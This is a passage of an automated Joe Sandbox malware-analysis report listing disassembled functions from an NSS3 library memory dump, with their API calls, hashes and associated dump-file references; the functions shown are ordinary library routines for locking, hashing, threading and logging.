                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2305085145-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a7cceb4f052a34bce19b73ac0412de8f15e78762a2831da9abc94f4068c4c7b5
                                                                                                                                                                                                                                                                                          • Instruction ID: f88447941e723cf2a0700e61cbc9f5aede0f5c5f897f7990e22eb64452a6837e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7cceb4f052a34bce19b73ac0412de8f15e78762a2831da9abc94f4068c4c7b5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D351F2B1B451009BDF606F28DE4AA6637F9EB1231CF65813AD90487722EF74E864CBC1
                                                                                                                                                                                                                                                                                          Function 6C757870 Relevance: 18.1, APIs: 12, Instructions: 138stringmemorythreadCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,?,?,6C7591C5), ref: 6C75788F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7507B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C6F8298,?,?,?,6C6EFCE5,?), ref: 6C7507BF
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7507B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7507E6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C75081B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7507B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C750825
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7591C5), ref: 6C7578BB
                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C7591C5), ref: 6C7578FA
                                                                                                                                                                                                                                                                                          • strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C7591C5), ref: 6C757930
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7591C5), ref: 6C757951
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C757964
                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C75797A
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C757988
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C757998
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C7579A7
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C7591C5), ref: 6C7579BB
                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,6C7591C5), ref: 6C7579CA
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Error$Alloc_HashLookupTablememcpy$ConstCurrentFindItem_ThreadZfreefreestrchrstrcmpstrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1862276529-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 8f8d78432458c6694d85e3b7fef10b16ac800d3d8544ea04b402e0f9a1ba6e10
                                                                                                                                                                                                                                                                                          • Instruction ID: 9a68f4a7926d73218d6b29a521ac4aa47a39bfab675496566edec8cab9622966
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f8d78432458c6694d85e3b7fef10b16ac800d3d8544ea04b402e0f9a1ba6e10
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E541A5B1A103019BEB108B7A9E49B6777ACAF4535CF544538E81997B41EB31F828C7B2
                                                                                                                                                                                                                                                                                          Function 6C674C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674C97
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674CB0
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674CC9
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674D11
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674D2A
                                                                                                                                                                                                                                                                                          • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674D4A
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674D57
                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674D97
                                                                                                                                                                                                                                                                                          • PR_Lock.NSS3(?,?,?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674DBA
                                                                                                                                                                                                                                                                                          • PR_WaitCondVar.NSS3 ref: 6C674DD4
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674DE6
                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674DEF
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3388019835-0
                                                                                                                                                                                                                                                                                          • Opcode ID: abc0851fa9b4b882678a1f76b740abaa71cf2f6e90b98ff680193441eda1ac6d
                                                                                                                                                                                                                                                                                          • Instruction ID: dedd890704bb9e535741a0c99c5b6efc6b174ac52c60d2cf8baa2ae6edfb7b2d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abc0851fa9b4b882678a1f76b740abaa71cf2f6e90b98ff680193441eda1ac6d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36419EB1A08610CFCB60AF78D18816977F4BF06318F158A79D8889B751EB70D884CFD9
                                                                                                                                                                                                                                                                                          Function 6C807CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C807CE0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9BF0: TlsGetValue.KERNEL32(?,?,?,6C800A75), ref: 6C7B9C07
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C807D36
                                                                                                                                                                                                                                                                                          • PR_Realloc.NSS3(?,00000080), ref: 6C807D6D
                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C807D8B
                                                                                                                                                                                                                                                                                          • PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6C807DC2
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C807DD8
                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000080), ref: 6C807DF8
                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C807E06
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
                                                                                                                                                                                                                                                                                          • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                                                                                                                                                                                                                                                          • API String ID: 530461531-3274975309
                                                                                                                                                                                                                                                                                          • Opcode ID: 36b98c31355fcb3fbc93dbfec88e11c8be494fa3b943d4d7a4e81a0d3fdbc636
                                                                                                                                                                                                                                                                                          • Instruction ID: baa4cec34cddb505e17b0ab75b1b6902aee181a32a34ededc8f1f7d5c7077f32
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36b98c31355fcb3fbc93dbfec88e11c8be494fa3b943d4d7a4e81a0d3fdbc636
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A41B2B16002059FDB24CF28CE8496B37B6BF85318F25496DEC199BB51D731E841CBA5
                                                                                                                                                                                                                                                                                          Function 6C807E20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103filestringpipeCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C807E37
                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSPR_INHERIT_FDS), ref: 6C807E46
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E1240: TlsGetValue.KERNEL32(00000040,?,6C6E116C,NSPR_LOG_MODULES), ref: 6C6E1267
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E1240: EnterCriticalSection.KERNEL32(?,?,?,6C6E116C,NSPR_LOG_MODULES), ref: 6C6E127C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C6E116C,NSPR_LOG_MODULES), ref: 6C6E1291
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E1240: PR_Unlock.NSS3(?,?,?,?,6C6E116C,NSPR_LOG_MODULES), ref: 6C6E12A0
                                                                                                                                                                                                                                                                                          • PR_sscanf.NSS3(00000001,%d:0x%lx,?,?), ref: 6C807EAF
                                                                                                                                                                                                                                                                                          • PR_ImportFile.NSS3(?), ref: 6C807ECF
                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C807ED6
                                                                                                                                                                                                                                                                                          • PR_ImportTCPSocket.NSS3(?), ref: 6C807F01
                                                                                                                                                                                                                                                                                          • PR_ImportUDPSocket.NSS3(?,?), ref: 6C807F0B
                                                                                                                                                                                                                                                                                          • PR_ImportPipe.NSS3(?,?,?), ref: 6C807F15
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Import$Socket$CriticalCurrentEnterFilePipeR_sscanfSectionSecureThreadUnlockValuegetenvstrlen
                                                                                                                                                                                                                                                                                          • String ID: %d:0x%lx$NSPR_INHERIT_FDS
                                                                                                                                                                                                                                                                                          • API String ID: 2743735569-629032437
                                                                                                                                                                                                                                                                                          • Opcode ID: 771d1d8fe42d8e35d8613b762d218e90ff275b10ab884507d65e2ef04bc73822
                                                                                                                                                                                                                                                                                          • Instruction ID: 76db4085f50e424a4a3870cb30334e5ae4fded898e447b35a097b33a52f7df45
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 771d1d8fe42d8e35d8613b762d218e90ff275b10ab884507d65e2ef04bc73822
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73312371B051198FEB209BA9CE44AABB7A8BF06B48F104D35D80597B11E7719C04C7D1
                                                                                                                                                                                                                                                                                          Function 6C714E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C714E90
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6C714EA9
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C714EC6
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6C714EDF
                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3 ref: 6C714EF8
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C714F05
                                                                                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C714F13
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C714F3A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C67204A), ref: 6C6E07AD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C67204A), ref: 6C6E07CD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C67204A), ref: 6C6E07D6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C67204A), ref: 6C6E07E4
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,6C67204A), ref: 6C6E0864
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6E0880
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,?,6C67204A), ref: 6C6E08CB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsGetValue.KERNEL32(?,?,6C67204A), ref: 6C6E08D7
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsGetValue.KERNEL32(?,?,6C67204A), ref: 6C6E08FB
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
                                                                                                                                                                                                                                                                                          • String ID: bUql$bUql
                                                                                                                                                                                                                                                                                          • API String ID: 326028414-21654339
                                                                                                                                                                                                                                                                                          • Opcode ID: 5fcfca11f29612215be9baee3d3d8bdf3d6bfddf0ecf74f4fb569ee9f5be9112
                                                                                                                                                                                                                                                                                          • Instruction ID: d1470f5c4fd9b2ac255e194d19633167d6d5f67d953378f1eccd6fc6052c5242
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fcfca11f29612215be9baee3d3d8bdf3d6bfddf0ecf74f4fb569ee9f5be9112
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA415BB4A046059FCB00EF78C1848AABBF4FF49308B158569EC999B711EB30E855CFD5
                                                                                                                                                                                                                                                                                          Function 6C73ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C73DE64), ref: 6C73ED0C
                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C73ED22
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8218D0,?), ref: 6C74B095
                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C73ED4A
                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C73ED6B
                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C852AA4,6C7512D0), ref: 6C73ED38
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C674C70: TlsGetValue.KERNEL32(?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674C97
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C674C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674CB0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C674C70: PR_Unlock.NSS3(?,?,?,?,?,6C673921,6C8514E4,6C7BCC70), ref: 6C674CC9
                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?), ref: 6C73ED52
                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C852AA4,6C7512D0), ref: 6C73ED83
                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C73ED95
                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C73ED9D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7564F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C75127C,00000000,00000000,00000000), ref: 6C75650E
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                                                                                          • API String ID: 3323615905-3315324353
                                                                                                                                                                                                                                                                                          • Opcode ID: 14154e931236c8768ff55e8451e946ea85d447a864c7061128ab14bb767f6b30
                                                                                                                                                                                                                                                                                          • Instruction ID: c669e6a7c66295570c22c52f058ab8c521bf0cc29f2ffda4ea05cacdbcd72198
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14154e931236c8768ff55e8451e946ea85d447a864c7061128ab14bb767f6b30
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E11607590021867E7625A21AE4DBBB7274AF0160DF800834E81962F42FF24AF1DC6D7
                                                                                                                                                                                                                                                                                          Function 6C722CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(C_InitToken), ref: 6C722CEC
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C722D07
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_Now.NSS3 ref: 6C800A22
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C800A35
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C800A66
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_GetCurrentThread.NSS3 ref: 6C800A70
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C800A9D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C800AC8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_vsmprintf.NSS3(?,?), ref: 6C800AE8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: EnterCriticalSection.KERNEL32(?), ref: 6C800B19
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C800B48
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C800C76
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: PR_LogFlush.NSS3 ref: 6C800C7E
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C722D22
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: OutputDebugStringA.KERNEL32(?), ref: 6C800B88
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C800C5D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C800C8D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C800C9C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: OutputDebugStringA.KERNEL32(?), ref: 6C800CD1
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C800CEC
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C800CFB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C800D16
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C800D26
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C800D35
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C800D65
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C8009D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C800D70
